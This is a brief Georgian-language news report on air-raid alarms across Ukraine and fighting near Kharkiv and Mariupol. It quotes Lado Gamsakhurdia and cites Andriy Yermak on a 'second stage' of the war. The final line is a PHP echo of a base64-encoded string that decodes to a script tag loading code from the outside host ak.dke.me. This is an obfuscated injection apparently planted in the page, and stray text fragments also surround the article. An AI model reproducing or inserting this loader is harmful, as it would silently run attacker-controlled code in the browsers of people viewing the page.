celsiusi
ავერსი საქკაბელი
კიევში და უკრაინის მთელ ტერიტორიაზე განგაშია გამოცხადებული, ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს უკრაინიდან "მრგვალი მაგიდა თავისუფალი კავკაასის" საბჭოს თავმჯდომარემ ლადო გამსახურდიამ განუცხადა. 
 
მისი თქმით, დღის განმავლობაში, უკრაინის თითქმის მთელ ტერიტორიაზე რამდენჯერმე გამოცხადდა განგაში. 
 
„ყველგან განგაშია, თუმცა, რა ინფორმაციაც ჩვენ გვაქვს, ამ დროისთვის, ძირითადად ხარკოვის და მარიუპოლის მხარეს უტევენ.  რაც მთავარია მეომრები არიან გაუტეხლად და შიში მათში არ ცხოვრობს, გვაქვს გათვიცნობიერებული, რომ რუსეთის ბოროტების იმპერია შესაჩერებელია აქ და ახლა, იმისთვის რომ ხვალ არ მოადგეს ჩვენი სახლის კარებს მთელი ძალით,“ – განაცხადა ლადო გამსახურდიამ. 
 
შეგახსენებთ, რომ უკრაინის პრეზიდენტის ოფისის ხელმძღვანელმა, ანდრეი ერმაკმა განაცხადა, რომ უკრაინაში ომის მეორე ეტაპი დაიწყო. 
 
1020
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");